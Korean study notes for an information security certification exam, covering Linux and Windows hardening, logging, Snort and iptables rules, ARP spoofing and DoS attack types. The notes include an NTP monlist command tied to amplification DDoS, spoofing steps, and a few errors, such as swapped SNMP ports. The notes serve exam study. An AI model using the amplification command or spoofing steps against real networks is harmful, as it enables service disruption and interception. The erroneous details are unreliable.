정보보안기사 개념 요약

by 이거인 2025. 5. 3. 11:36

용어	설명
사이버 킬체인	APT를 대비하기 위한 대책(정찰 > 무기화 > 전달 > 공격 > 설치 > 명령 및 제어 > 목표 장악)으로 록히드마틴사가 정식 명칭을 특허로 등록
ATT&CK Framework	MITRE에서 실제 공격 사례를 바탕으로 Cyber Kill Chain 단계를 자체적으로 개발(Adversarial Tactics, Techniques, and Common Knowledge)하여 정리
APT(Advance Persistent Threat)	지능형 지속 위협, 특정 대상을 겨냥해 다양한 공격기법을 동원하여 장기간 지속적으로 공격하는 기법
YARA	바이러스 토탈(Virustotal)에서 제작하였고, 악성코드의 특성과 행위에 포함된 패턴을 이용하여 악성코드를 분류하는 툴
MITM(Man-In-The-Middle) 공격	- 공격자가 두 당사자 간의 통신을 가로채 메시지를 도청하거나 조작할 수 있는 공격 - 대응방안: 암호화 구현(SSL/TLS), 보안 통신 프로토콜 사용(HTTPS), 소프트웨어 최신 버전 유지, 보안되지 않은 공용 WIFI 방지
바이러스	일반적으로 확산되려면 감염된 파일을 다운로드하는 등 사용자 상호작용이 필요, 시스템 손상시키거나 제어함
웜	사용자 개입 없이 네트워크나 인터넷을 통해 확산되는 자가 복제 프로그램, 네트워크 정체 및 시스템 충돌 일으킴
트로이 목마	무해한 프로그램이나 파일로 위장하고 시스템 감염시키는 프로그램으로 합법적인 것처럼 보이거나 사용자를 속여 설치하게 하고 백도어 생성하거나 정보 도용함
멀버타이징(Malvertising)	합법적인 온라인 광고에 악성 코드를 삽입하거나 사용자가 클릭하도록 속이는 가짜 광고를 생성하는 것
TMS(Threat Management System)	- 전사적 IT인프라에 대한 위협정보 들을 수집·분석·경보·관리하는 정보보호 통합관리 시스템이며 실시간으로 공신력 있는 대외 정보보호기관의 위협정보들을 수집·분석하여 정보보호관리자에게 제공함으로써 각종 보안위협으로 부터 사전 대응 및 예·경보 체계를 구축하고 이를 통해 APT 등 알려지지 않은 공격들에 대한 조기 대응을 유도한다. (EDR 등 다른 솔루션에 밀려서 제품 없음)
클라우드 환경	퍼블릭 클라우드, 프라이빗 클라우드, 하이브리드 클라우드
클라우드 서비스	IaaS(Infra구조 레벨을 제공하는 서비스), PaaS(플랫폼 및 환경 제공), SaaS(SW 사용), SecaaS(SaaS 중 보안서비스)
공급망 공격	소프트웨어 공급망에 침투하여 악성코드를 배포하는 공격으로, SW빌드 및 배포 과정에 악성코드를 삽입하여 선의의 소프트웨어를 통해 이용자들을 공격
안전한 함수	strcat_s(), strcpy_s(), gets_s(), fgets(), scanf_s()

시스템 보안

Linux

용어	설명
링크(윈도우의 바로가기 개념)	- 하드링크 : 동일한 i-node number - 심볼릭링크 : 별도의 i-node number
useradd 명령어	- root만 사용가능 - -o 옵션은 중복 UID를 허용하는 옵션
디렉터리	- /proc: 현재 실행되고 있는 프로세스 정보 기록
Context Switching(문맥교환)	CPU를 차지하고 있던 프로세스가 CPU 자원을 반납하고 새 프로세스가 CPU를 할당받는 것
디스크립터 테이블(FDT)	표준입력, 표준출력, 표준에러
로그인불가계정의 로그인쉘	/sbin/nologin 또는 /bin/false
SSH	22/TCP
facility	로그 생성 서비스
prioroty	로그 수준 (level): Emergency(시스템 전면 중단) Alert(즉각 조치 필요) Critical Error Warming Notice(normal event) Infomation debug
[Linux] U-17 (상)	$HOME/.rhosts, hosts.equiv 사용 금지: 파일 소유자를 root 또는 해당 계정으로 변경하고 권한을 600 이하로 변경 -$HOME/.rhosts, /etc/hosts.equiv 파일에서 +를 제거하고 반드시 필요한 호스트/계정만 등록
프로세스 상태	준비, 실행, 대기, 교착 상태 (프로세스를 관리하기 위해 PCB를 생성)
페이지 교체 알고리즘	LRU(least recently used), LFU(least frequently used), NUR(not used recently)

명령어

Command	설명
ls -l	시간 = M Time(내용수정시간)
ps -l	Z = 좀비상태
kill -9 또는 kill -KILL	프로세스 강제종료 가능 (단, 좀비프로세스는 삭제 불가)
crontab	- 명령 실행 결과: 분 시 일 월 요일 작업(절대경로) - cron.allow > cron.deny (둘 다 존재할시 cron.deny는 무시됨) -l 파일출력, -e 파일 편집, -r 파일삭제
passwd -l	패스워드 잠금
passwd -u	잠금해제
strace	특정 프로그램의 시스템 콜과 시그널을 추적하는 툴 (예시) `strace -e trace=open ps
history	명령어 이력을 볼 수 있음. 로그인 후 입력했던 명령어들과 명령어 뒤에 입력한 parameter까지 확인 가능
umask	파일 생성 시 기본 권한 설정 가능 (예시) umask 022인 경우, 파일 최대 권한 666 - umask = 644
chmod	파일 허가권 변경 `chmod 400 test.txt`
chown	파일 소유자 변경 `chown redstone test.txt`
계정관리모듈 PAM의 계정 임계값 설정 옵션	- deny=5 #5회 틀릴 시 계정 잠금 - unlock_time=120 #계정잠금 후 120초 후 잠금 해제 - no_magic_root #루트계정 잠금설정 안함 - reset #접속 성공 시 실패횟수 초기화
find	파일 검색 명령어 > find / -mtime -7 #최근 7일 이내 변경된 모든 파일 검색 > find / -user root -perm -4000 #사용자가 root이면서 접근권한이 setuid로 설정된 모든 파일 검색
syslog	로그 프로토콜, 정보보호 특성을 고려하지 않고 개발되어 암호화 안함, udp 514포트 사용, tcp를 이용하도록 권고
beep	로그 프로토콜, TCP, 암호화
계정정보 변경	(솔라리스, 리눅스 HP-UX) usermod (AIX) chuser id=100 test

권한

Set-UID(SUID): 권한이 부여된 파일을 실행하면 실행하는 동안 해당 파일의 소유자 권한으로 인식함
Set-GID(SGID): 권한 실행하는 동안 해당 파일의 소유자 그룹 권한으로 인식한다
Sticky-Bit: 디렉터리에만 적용되는 권한으로, 이 권한이 적용된 디렉터리엔 일반 사용자들이 자유롭게 파일 생성, 수정, 읽기 가능하다. 다만 파일 소유자나 root 외에는 삭제가 불가능함
권한(umask) : r 읽기(4), w 쓰기(2), x 실행(1)
- 파일 기본권한 666
- 디렉터리 기본권한 777
접근권한 설명
- -r-sr-xr-x root sys /etc/chk/passwd : 소유자의 실행권한이 s이므로 setuid 설정이 되어있다. 따라서 일반 사용자 계정으로 해당 파일 실행하더라도 소유자인 root 권한으로 실행된다.
- -r-xr-sr-x root mail /etc/chk/mail : 그룹의 실행권한이 s이므로 setgid 설정이 되어 있다. 따라서 일반 사용자 계정으로 해당 파일 실행하더라도 mail 그룹 권한으로 실행된다.
- drwxrwxrwt sys sys /tmp : 모든 사용자가 읽기, 쓰기, 실행 권한이 주어져있으며, 제3자의 실행권한이 t로 sticky bit 설정되어있다. 따라서 누구나 해당 디렉터리에 자유롭게 파일 생성, 수정, 읽기 가능하다. 다만 파일 소유자나 root 외에는 삭제 불가능하다.

환경파일

(x)inetd.conf 파일: 리눅스의 서비스 서버 설정파일 (권한 600 이하)
- 파일구조: 서비스명 소켓타입 프로토콜 플래그 사용자계정 실행경로명 실행인수
  - 실행되는 서비스 데몬들 정의 (주석처리 시, 중지)
  - TCP wrapper 사용방법: 실행경로를 /usr/sbin.in.telnet 에서 /usr/sbin/tcpd로 변경
- 소켓타입: tcp(stream), udp(dgram)
hosts.allow / hosts.deny 파일 (Tcpwrapper 서비스 = 호스트 방화벽) (권한 600 이하)
# hosts.allow 예시 in.ftpd : 192.168.1 #192.168.1로 시작하는 IP주소에 ftp 서비스 허용 in.telnetd : .com EXCEPT www.abc.com # abc.com을 제외한 .com 도메인의 호스트에 telent 서비스 허용 ALL : ALL # 모든 서비스에 대해 모든 호스트 허용 ALL EXCEPT in.telentd # ALL 모든 호스트에게 텔넷제외 모든 서비스 허용 ALL : LOCAL #같은 네트워크 호스트 모두 허용
in.telentd 파일 (Telent 서비스)
- (예시) 192.168.1. 192.168.1.으로 시작하는 호스트들에게 텔넷 허용
root 계정의 원격접속 제한
- 텔넷
  - /etc/securetty 파일에서 pts/~ 터미널 제거
  - /etc/pam.d/login 파일 수정하여 pam_securetty.so 모듈 사용 처리(auth required /lib/security/pam_security.so)
- SSH : /etc/ssh/sshd_config 파일 (PermitRootLogin no로 설정)
root 계정 su 제한 : pam_wheel.so 모듈 사용
sudo 명령을 이용한 관리자 권한 부여 : /etc/sudoers 파일에 사용자 추가
/etc/pam.d 파일 (PAM 서비스: 사용자를 인증하고, 사용자의 서비스에 대한 액세스를 제어하는 모듈화된 방법)
- type : auth, account, password, session
- control : requsite, required, suffcient, optonal
- 계정잠금 임계값 설정 방법 = pam_tally2.so 모듈 사용
  - (예시) auth required pam_tally2.so deny=3 unlock_time=10
  - (예시) account required pam_tally2.so
syslog.conf (권한 644 이하)
services 파일 (권한 644 이하)
MAC Time 정보
- mtime: 파일 내용이 마지막으로 수정된 시간 (확인> find / -mtime -10 #10일 이내에 수정된 파일 조회)
- atime: 파일에 마지막으로 접근한 시간
- ctime: 파일의 속성 정보가 마지막으로 변경된 시간

패스워드 관련 환경파일

/etc/passwd: 사용자 계정 아이디, 비밀번호 등 계정 정보 포함 (권한 644이하)
- [계정명:비밀번호:UID:GID:주석:홈디렉터리:쉘]
/etc/shadow: 암호화된 비밀번호, 정책 설정 정보 확인 파일 (권한 400이하)
- [계정명:비밀번호(암호화):마지막 변경일:최소사용일:최대사용일:만료전경고일수:접속차단일수(유예기간):사용금지일수(만료일)]
- shadow 활성화/비활성화
  - shadow 파일 사용: > pwconv: /etc/passwd 방식을 /etc/shadow로 변환해줌
  - shadow 파일 미사용: pwunconv
- 두번째 필드: $해시알고리즘id값$솔트$암호화된값(비밀번호) 예: $6$CWA90qcuqNsVFrEw$NvfCN4S1iJH...
  - 첫번째 $항은 해시암호 알고리즘 종류 ($1 : MD5, $5 : SHA256, $6 : SHA512)
  - ! or !! : 계정에 비밀번호가 설정되어 있지 않아 잠가놓은 상태
  - - : 이 계정을 통해서 아예 로그인을 할 수 없음을 의미
  - 빈 값 : 비밀번호 없이 로그인을 할 수 있는 상태를 의미
/etc/login.defs: 패스워드 정책 설정 파일
- 로그인 시 적용되는 기본 정보 구성 파일
- 최소 및 최대 비밀번호 길이, 비밀번호 만료 정책 및 계정 잠금 정책 설정 포함
리눅스/유닉스 패스워드 정책 비교

OS	파일명 및 명령어
리눅스	- 패스워드 정책 파일 : /etc/login.defs - 최소길이 명령어 : `PASS_MIN_LEN N` - 섀도우 저장정책 `pwconv` / 반대는 `pwunconv`
솔라리스	- 패스워드 정책 파일 : /etc/default/passwd - 최소길이 명령어 : `PASSLENGTH = N`
AIX	- 패스워드 정책 파일 : /etc/security/user - 최소길이 명령어 : `minlen = N`
HP-UX	- 패스워드 정책 파일 : /etc/default/security - 최소길이 명령어 : `MIN_PASSWORD_LENGTH = N`

Unix 로그파일(/var/adm/) 라수로

last log: 마지막으로 성공한 로그인 정보를 담고 있는 로그파일
- LINUX: lastlog 명령어
- UNIX: finger 명령어 -t N(N일내 기록 옵션)
sulog : su명령어 결과 저장 (유닉스 only)
loginlog: 5번 이상 실패한 로그인 시도에 대한 기록(lastb 명령어)
Linux 로그파일(/var/log)
utmp: 현재 로그인한 사용자 상태 정보 로그파일(w, who, finger 명령어로 확인)
wtmp: 사용자 로그인/로그아웃 정보 및 시스템 boot/shutdown 기록을 담고 있는 로그파일(last 명령어)
btmp: 5번 이상 로그인에 실패했을 경우, 로그인 실패 정보를 담고 있는 로그파일(lastb 명령어)
- Unix는 /var/adm/loginlog 파일
acct/pacct : 로그인한 모든 사용자가 입력한 명령어 기록 (lastcomm 명령어)
history : 계정별로 실행한 명령어에 대한 기록
/var/log/secure : 사용자 인증에 대한 정보
/var/log/messages : 리눅스 시스템 기본적인 시스템 로그 파일
/var/log/xferlog : ftp 서비스 로그 파일
- 구조: 전송날짜및시간 전송소요시간 원격호스트주소 전송파일크기 전송파일명 전송유형 액션플래그 전송방향 접근방식 사용자명 서비스명 인증방법 사용자id 결과
- 전송유형 : a아스키 b바이너리
- 액션플래그 : _없음 C압축 U압축해제 T아카이브
- 전송방향 : i 업로드 o 다운로드 d 삭제
- 접근방식 : r로컬 a익명 g게스트
- 사용자명 : 익명이면 ? 로 표기
- 결과 : c성공 i실패
/etc/profile: export TMOUT=600 #Session Timeout 설정

/etc/logrotate.d/logrotate.conf (로그파일 순환)

log 저장 및 관리 시 크기 커지는걸 방지하기 위해 분산시키는 명령어 설정 파일
파일 내용(옵션)
/var/log/httpd/*log{ monthly|weekly|daily #월, 주, 일 단위 rotate 실행 주기 rotate [숫자] #log 파일이 [숫자] 이상이 되면 삭제 maxage [숫자] #log 파일이 [숫자]일 이상이 되면 삭제 size [숫자] #지정된 용량보다 클 경우 rotate 실행 create [권한] [유저] [그룹] #rotate 되는 로그파일 권한 지정, 예) create 644 root root compress #rotate되는 로그파일 압축 dateext #백업 파일 이름에 날짜 입력 }

Unix

유닉스 시스템의 3가지 컴포넌트: 커널, 쉘, 파일시스템
파일시스템 구성: 부트블록, 슈퍼블록, 아이노드 블록, 데이터 블록
- 부트 블록: 운영체제 부팅시 부트 코드를 담은 블록
- 슈퍼블록: 파일시스템을 관리하기 위한 블록
- 아이노드 블록: 파일시스템의 파일들에 대한 속성 정보를 담은 아이노드 저장
- 데이터 블록: 실제 파일 내용 저장
시스템V IPC: 시스템V계열 유닉스에서 제공하는 프로세스간 통신 방법
- 종류: 메세지 큐, 공유 메모리, 세마포어
- Message Queue : 메시지를 전달할 수 있는 Queue를 생성
- Shared Memory : 커널이 메모리 영역을 잡아주어 프로세스간에 같이 쓸 수 있도록 함
- Semaphore(세마포어) : 프로세스간 동기화를 위함 (접근순서 컨트롤)

Windows

BitLocker: Windows 전용으로 제공되는 볼륨 암호화 기능
- TPM(신뢰할 수 있는 플랫폼 모듈)을 사용하며 AES-128 알고리즘을 사용
Windows 인증
- 구성요소
  - LSA(Local Security Authority) : 모든 계정 로그인에 대한 검증 및 시스템 자원에 대한 접근권한 검사
    - 이름과 SID(Security Identifier, 사용자나 그룹의 고유 식별 번호 > whoami /user) 매칭
    - SRM이 생성한 감사로그 기록
    - NT 보안의 중심요소, 보안 서브시스템
  - SAM(Security Account Manager) : 사용자, 그룹계정, 암호화된 패스워드를 저장하는 데이터베이스 (SID 정보 포함)
    - 저장경로: %systemroot(C:\Windows)%/system32/config/sam
  - SRM(Security Reference Monitor) : 인증된 사용자에게 SID 부여, SID 기반 파일/디렉터리에 대한 접근허용여부 결정, 감사 메시지 생성
- SID: 500(관리자, Administrator), 501(Guest), 1000(일반사용자)
- 인증 과정
  - 로컬인증: LSA -> NTLM 모듈 -> SAM 처리
  - 원격인증: LSA -> 커버로스 프로토콜 -> 도메인컨 트롤러DC 처리
    - NTML v2 해시 : 윈도우비스타 이후 기본 인증 프로토콜. 복잡도 충분.
공유폴더 해제 설정: AutoShareServer DWORD 0
- 공유디렉토리 삭제 명령어> net hsare c$ /delete
이벤트 뷰어: 윈도우에서 로그 조회/관리 도구
- 애플리케이션 로그(application.evtx): 응용프로그램 이벤트 로그
- 시스템로그(system.evtx): 시스템 시작 및 RDP 연결 등의 로그
- 보안로그(security.evtx): 로그인 성공 및 네트워크 로그인 로그
감사정책
- 개체 접근: 파일 디렉터리 등에 대한 접근 객체 기록
- 계정 접근: 계정관리 이벤트 감사
- 계정 로그온 이벤트: 도메인 계정에 대해 성공한 로그온 이벤트
- 권한 사용: 성공 및 실패 감사
- 디렉토리 서비스 액세스: AD 개체의 사용자 접근
- 로그온 이벤트: 로컬 계정에 대한 로그온/로그오프 감사
- 시스템 이벤트: 시스템 시작/종료 감사
- 정책 변경: 감사 정책 변경 감사
- 프로세스 추적: 실행되는 프로세스에 대한 감사

익스플로잇 코드

Shell Code : 어셈블리어/기계어로 구성되어 있는 익스플로잇 코드의 본체에 해당하는 프로그램
0x90 : NOP(No Operation)에 해당하는 x86 Hex code
0x00 = null값, 문자열의 끝
RET EIP ESP : ESP 레지스터에 있는 값을 EIP 레지스터로 옮기는 어셈블리 명령어
스택 BOF 대응기술: 스택가드(복귀주소와 변수사이에 특정 값 저장, 스택쉴드(글로벌 RET), ASLR(난수화)
Format String Attack
- %n, %hn : 출력한 총 바이트수 출력. 악성코드 주소값 저장될수있음

스택

ESP 최하위 포인터 저장
EBP 스택프레임의 기준이 되는 SFP 포인터 저장
EIP 다음에 실행할 명령어 주소값 저장
PUSH EBP로 백업(프롤로그)
POP EIP으로 백업을 꺼낸다(에필로그)

데이터베이스

데이터베이스 관련 공격
- 집성 공격: 낮은 보안등급의 정보조각을 조합하여 높은 등급의 정보 알아내는 것
- 추론 공격: 보안사항이 아닌 정보로 기밀번호를 유추하는 것
- 데이터 디들링: 입력값/출력값을 위변조하여 잘못된 결과가 나오도록 유도하는 것
데이터베이스 보안 통제
- 접근통제: 사용자에 대한 인증 및 권한에 따라 정보 접근 허용
- 추론통제: 데이터 추론할 수 없도록 방지(질의 길이 제한 등)
- 흐름통제: 보안등급이 높은 객체에서 낮은 객체로의 정보흐름 제어

네트워크 보안

IPv6 전환 기술

듀얼스택 (선택적)
터널링 (캡슐화)
주소/헤더 변환 (변환헤더)

ICMP

Destination Unreachable (3)
- Unreachable 3 = Port Unreachable : UDP 포트가 열려있지 않음
- Redirection (5)
- Time Exceeded (11)
ICMP Unreachable 메시지 차단

interface null 0
no ip unreachables

Echo Request(Type 8) and Reply(Type 0)

TCP 프로토콜

흐름제어, 오류제어, 혼잡제어
Control Flags: URG(긴급데이터, OOB 설정), ACK(수신확인응답), PSH(송수신 버퍼에 있는 데이터 즉시 처리), RST(연결 중단), SYN(연결설정), FIN(연결 종료)

ARP(Address Resolution Protocol)

논리적인 주소(IP주소)를 물리적인 주소(MAC주소)로 변환하는 프로토콜
반대로 MAC주소를 IP주소로 변환하는 것은 RARP
프로토콜 방법: 목적지 IP주소는 알지만 MAC주소는 모를때, 목적지 MAC주소를 00:00:00:00:00:00으로 하고 패킷 목적지를 Broadcast(FF:FF:FF:FF:FF:FF)로 하여 네트워크 상 모든 노드한테 뿌려서 목적지 MAC주소를 획득 후, 획득한 목적지 MAC주소를 ARP cache에 저장
ARP Spoofing: 피해자의 MAC 주소로 위조하여, 피해자의 IP로 전달되는 데이터를 중간에서 가로채는 공격
- 예) 서로 다른 IP가 같은 MAC주소를 가지고 있는 경우
- 대응방안: ARP cache 테이블 정보를 정적(static)으로 설정하여 ARP 프로토콜을 통한 변조 발생하지 않도록 함 arp -s [게이트웨이 IP] [게이트웨이 MAC]
- 공격방법
  - 공격자가 피해자에게 자신의 MAC주소를 게이트웨이(서버 등)의 주소인 것처럼 속인다.
  - 공격자가 게이트웨이에게 자신의 MAC주소를 피해자의 MAC주소인 것처럼 속인다.
  - 공격자는 피해자 및 게이트웨이로부터 메시지를 받게 되고, 이를 정상적으로 보내주면 통신은 정상적으로 이루어지면서 공격자는 모든 메시지를 읽을 수 있다.
ARP Redirect 공격: Gateway의 MAC주소로 위조하여, 공격자가 피해자들에게 자신이 라우터라고 속여서 피해자들의 패킷이 자신에게 한번 거친 후 라우터로 가도록 하는 공격SNMP(Simple Network Management Protocol)
네트워크에 있는 장비들을 관리하기 위한 프로토콜
Manager가 Agent에게 필요한 정보를 요청하는 역할 (162/UDP 사용)
Agent가 Manager에게 주기적으로 보고(설치된 시스템의 정보나 네트워크 정보)하는 역할(161/UDP 사용)
Trap: 에이전트가 매니저에게 보고하는 과정
msgSecurityParameters 보안설정
- 재전송 공격 방지: msgAuthoritativeEngineID, msgAuthoritativeEngineBoots, msgAuthoritativeEngineTime
- 위장 공격 방지: msgUserName, msgAuthenticationParameters
- 기밀성: msgPrivacyParameters
라우터에서 snmp 프로토콜 비활성화 명령어무선인터넷
Router# configure terminal Router(config)# no snmp-server
인증 방식: 개인은 PSK 모드, 기업은 802.1x/EAP 모드 사용
- PSK(Pre Shared Key): 별도의 인증서버 없는 소규모 망에서 사용되며, 초기 인증에 사용되는 PSK값을 이용해 4웨이 핸드쉐이킹 과정을 통해 무선AP와 무선단말기가 동일한 값 가지고 있는지 확인
- EAP(Extensible Authentication Protocol): 초기에는 PPP에서의 사용을 위해 개발되었으나 현재는 무선랜 표준인 IEEE 802.1x에서 사용자 인증 방법으로 사용되며, 어떤 링크에도 접속 가능함
보안 기술
- WEP(Wired Equivalent Privacy): 초기 무선랜 보안 기술, RC4 알고리즘 사용
  - 문제점: 24bit의 짧은 길이를 사용하므로 재사용 가능, 불완전한 RC4 사용하여 암호키 노출 가능, 무선전송 데이터 노출 위험성
- WPA(Wifi Protection Access) = WPA1: EAP를 통해 인증을 수행하고 RC4-TKIP 알고리즘으로 암호화
- WPA2: EAP를 통해 인증을 수행하고 AES-CCMP 알고리즘으로 암호화 지원
WIPS(무선침입방지시스템): 비인가 무선 단말기의 접속을 탐지 및 차단하고, 보안에 취약한 무선공유기AP를 탐지
무선 표준
- IEEE 802.11 : Infrastructure 모드, Ad-Hoc 모드
- IEEE 802.11i 보안 표준 : WPA1, WPA2
무선 AP 물리적/관리적 보안
1. SSID 변경 및 브로드캐스트 금지
2. 무선AP Default Password 변경
3. 무선 AP의 물리적 접근 제한

Snort

실시간 트래픽 분석과 네트워크 패킷 처리가 가능한 오픈소스 IDS S/W
(리눅스) /etc/snort 디렉터리 밑에 설정 파일 등이 위치함
Snort Rule: 크게 헤더(Header)와 바디(Body)로 구성됨
- Rule Header 구조: [action]+[Protocol]+[IP주소]+[Port번호] alert udp 0.0.0.0/0 any -> 192.168.10.0/24 any
  - action 유형

alert: 알람 발생, 패킷을 로그에 기록

log: 패킷 로그에만 기록

pass: 아무런 처리없이 통과

activate: 알람 발생, dynamic 룰 동작

dynamic: activate 룰에 의해 트리거, 패킷 로그에만 기록

drop: 패킷 차단하고 로그 기록

reject: 패킷 차단하고 로그 기록하며 Reset or ICMP port unreachable 메시지 전송

sdrop: 패킷 차단만 하고 로그 기록하지 않음

- Rule Body 기본설정: 패킷 검출을 위한 다양한 옵션 설정 가능
  - msg: 룰 타이틀 명으로 이벤트 발생 시 로그에 기록되는 항목
  - sid: snort rule id (~~99: 시스템 예약 sid, 100~~: snort에서 사용하는 sid)
  - classtype: rule에 대한 이벤트 유형 정보
  - rev: rule 버전 정보로 수정한 횟수
- Rule Body 페이로드/범위 관련 옵션
  - content: 패킷의 payload에서 검사할 문자열 지정 |바이너리값|
  - uricontent: URI 정보 검사
  - nocase: payload 검사 시 대소문자 구분안함
  - offset : payload에서 패턴 매칭할 시작 위치(0 부터 시작), offset 바이트만큼 띄우고 검사 시작
  - depth : payload에서 패턴 매칭할 끝 위치(0+offset 시작), depth 바이트만큼 검사
  - distance N: 이전 검색 마친 위치에서 N bytes만큼 띄우고 검사 시작
  - within: distance로부터 N 바이트 범위 내 검사
- Rule Body 이벤트 관련 옵션
  - threshold type <limit|threshold|both> track [출발지|목적지] count c seconds s
  - limit : 매 s초동안 c번째 이벤트까지
```
- tcp 플래그가 아무것도 설정되지 않거나, 모든 플래그가 설정된 경우 초당 1개까지만 -j 로그 또는 차단
- p tcp --tcp-flags ALL NONE -m limit --limit 1/second
- p tcp --tcp-flags ALL ALL -m limit --limit 1/second
```
  - threshold : 매 s초동안 c번째 이벤트마다
  - both : 매 s초동안 c번째 이벤트시 한 번만
Suricata: 오픈소스 IDS/IPS로, 기존의 Snort의 장점을 수용하고, 대용량 트래픽을 실시간으로 처리하는데 특화된 소프트웨어
펄 호환(PCRE) 정규식
- \ 특수문자 제거
- ^ 다음에 오는 문자가 문자열의 시작
- $ 바로 앞의 문자가 문자열의 끝을 의미함
- . 임의의 문자 1개

IPtables

리눅스 OS 방화벽으로, 네트워크 방화벽과 동일하게 IP/Port 기반으로 패킷 차단/허용 가능
구조: iptables [테이블명] [체인명] [룰] [타겟]
- 테이블 종류
  - Filter: default, 패킷 필터링 담당
  - Nat: IP 주소 변환 처리(SNAT, DNAT)
  - Mangle: 성능 향상을 위한 TOS 설정
- 체인 종류(Filter TABLE일 경우)
  - INPUT: 외부에서 들어오는 패킷 담당
  - OUTPUT: 외부로 나가는 패킷 담당
  - FORWARD: 방화벽을 경유하여 외부에서 다른 시스템으로 전달되는 패킷
- 룰
  - 프로토콜: -p TCP, -p UDP
  - SYN 플래그: --syn
  - IP 주소: -s IP주소, -d IP주소
  - Port 번호: --sport 포트번호, --dport 포트번호
- 타겟
  - -j: ACCEPT(허용), DROP(차단), REJECT(차단 후 ICMP 에러 전송), LOG(탐지 로그만 남김)
명령어 예시
service iptables stop #iptables 끄기 service iptables start #iptables 켜기
차단 룰 예시
iptables -A INPUT -s 아이피 -j DROP iptables -A INPUT -p TCP --syn --dport 80 -m recent --update --seconds 2 --hitcount 30 --name SYN_DROP -j DROP

명령어

Command	설명
traceroute/tracert	여러 중계 노드(L3장비/라우터) 각 구간에 대한 네트워크 상태를 관리, TTL을 1씩 증가시키면서 반복하는 방식
traceroute	traceroute는 유닉스/리눅스에서 UDP
tracert	윈도우에서 ICMP
netstat	-a 모든소켓 -i 인터페이스 -r 라우팅테이블 -s 프로토콜별 통계
ifconfig ens3(인터페이스명) promisc	무차별모드 설정

DOS

공격 대상 시스템이 정상적인 서비스를 할 수 없도록 만드는 공격
종류: DDoS, DRDoS, Unicast RPF
- DoS는 공격자가 단일 컴퓨터를 통해 공격
- DDoS: 물리적으로 분산된 다수의 컴퓨터(좀비 PC)를 이용하여 특정 사이트나 시스템을 공격하여 정상적인 서비스를 할 수 없도록 하는 공격
  - 봇넷, 중앙집중(IRC, HTTP), 분산(P2P)
  - 우회기법
    - Fast Flux 패스트 플럭스 기법 : C&C서버의 IP를 지속적으로 변화
    - DGA 기법 : C&C서버 도메인을 지속적으로 동적 생성
    - Domain Shadowing 도메인 쉐도잉 : 정상 도메인 관리자 정보 탈취 및 불법적으로 서브 도메인 생성
    - DNS 싱크홀: 감염된 PC가 C&C서버로 연결을 시도할 때, C&C서버 대신 싱크홀 서버로 우회
  - NTP(UDP 123) DDoS: 네트워크를 통해 컴퓨터 시스템간 시간 동기화를 위해 사용
    - monlist 명령어를 통해 대규모 증폭, 반사 형태 디도스 공격 유발 ntpdc -n -c monlist "NTP 서버 IP"
  - SSDP(UDP 1900) DDoS: "M-SEARCH * HTTP/1.1"로 시작하는 요청 패킷
- DRDoS 공격 원리: 공격자는 Source IP를 공격대상의 IP로 위조하여 다수의 반사서버로 요청을 보내고, 공격대상 서버는 반사서버로 부터 다수의 응답을 받아 서비스 장애
  - 반사(Reflection) + 증폭(Amplification) (ANY, TXT 타입)
  - 요청 대비 질의에 대한 응답이 매우 크기 때문에 발생
  - dns, ntp, snmp, charegn 등 활용
- 기존 DoS와 DRDoS의 차이점
  - 출발지 IP가 위조되고, 반사서버를 통해 공격이 수행되므로 공격의 출처를 파악하기 어려움
  - 다수의 좀비 PC를 동원하지 않더라도 대량의 공격 패킷을 만들어 낼수 있어 효율이 높음
Unicast RPF: 네트워크에서 IP Spoofing을 방지하는데 사용됨
- 패킷의 source IP를 라우팅 테이블과 비교하여 들어오는 패킷의 Source IP를 확인
- 출발지 IP에 대해 라우팅 테이블을 이용하여 유입된 인터페이스로 다시 전송되는지(역경로) 여부를 체크
Slow 공격
- 대응책
  - 동일 출발지 IP의 동시 연결에 대한 임계치 설정 iptable -m connlimit --conlimit-above 30
  - 연결 타임아웃 설정 Timeout 120
  - 읽기 타임아웃 설정 RequestReadTimeout header=5 body=10
- Slow HTTP Read DoS 공격: window size: 0
  - Window Size를 줄여서 서버의 데이터를 적게 받는 공격
  - (※ 혼동주의!!) HTTP 응답 분할 공격 ≠ DoS
  - HTTP Request에 있는 파라미터가 HTTP Response의 응답헤더로 다시 전달되는 경우 파라미터 내 개행문자 CR(Carriage Return, %0D) 혹은 LF(Line Feed %0A)가 존재하면 HTTP 여러개로 나누어질 수 있음
  - 응답 메시지에 악의적인 코드를 주입함으로써 XSS 및 캐시를 훼손하는 취약점
- (서비스 마비) Slow HTTP Post DOS 공격(RUDY): Content-Length
  - 헤더 필드의 Content-Length를 비정상적으로 크게 설정한 후, 매우 작은 데이터를 천천히 웹 서버에 전송하여 연결 상태를 유지하여 웹 서버의 가용량을 침해하는 공격
  - 예) HTTP Request 메시지 내 Content-Length는 매우 크나, 패킷 분석 도구(Wireshark Pachet)에서는 Length가 작게 보이는 경우
  - 대응방안: Connection Timeout 설정, Read Timeout, 서버 방화벽 설정하여 동일한 소스 IP에서 동시 연결가능한 개수의 임계치를 설정하여 초과 시 차단
- (대역폭 소진) Slow HTTP Header DoS 공격: CR, LF (0x0d0a)
  - HTTP 관련 공격 중 헤더의 CRLF(개행문자) 필드 부분을 조작함으로써 웹서버로 조작된 HTTP 헤더를 지속적으로 보내 서비스의 가용성을 떨어뜨리는 공격
  - 예) 헤더 끝을 알리는 개행 문자열 \r\n\r\n (Hex: 0d 0a 0d 0a)을 포함하지 않고 전송
  - 대응방안: 방화벽 등을 통해 동시 연결에 대한 임계치 설정
주요 공격
- Smurf 공격: DDoS 공격의 하나로, ICMP 특성을 이용한 공격
  - 출발지(Source) IP를 희생자 IP로 위조한 후, 브로드캐스트 도메인으로 ICMP 메세지를 전송하는 공격 (ICMP Echo Request > Echo Reply)
  - 대응방안
    - 패킷 필터링을 통해 Echo Reply message의 rate-limit 설정하여 한꺼번에 동일한 ICMP Echo Reply message 들어오는 것을 막기
  - 사전 조치
    - 라우터에서 Direct Broadcast를 비활성화: no ip directed-broadcast
    - 또는 신뢰할 수 있는 네트워크 범위에 대해서만 ip direct broadcast 활성화하기
    - (config)# access-list 100 permit udp [신뢰할 수 있는 네트워크 범위] any (config)# interface FastEthernet 0/0 (config-if)# ip directed-broadcast 100
- LAND(Local Area Network Denial) Attack: DDoS 공격의 하나로, IP 스푸핑을 이용한 SYN 공격
  - 출발지와 목적지의 IP 주소를 공격대상의 IP주소와 동일하게 설정하여 보내는 공격
  - 대응방안: 네트워크로 유입되는 패킷 중 source IP가 내부 IP인 패킷 차단
- Teardrop Attack(DDoS): IP패킷의 offset값을 서로 중첩되거나 멀리 떨어지게 조작 (유사 : Bonk, Boink )
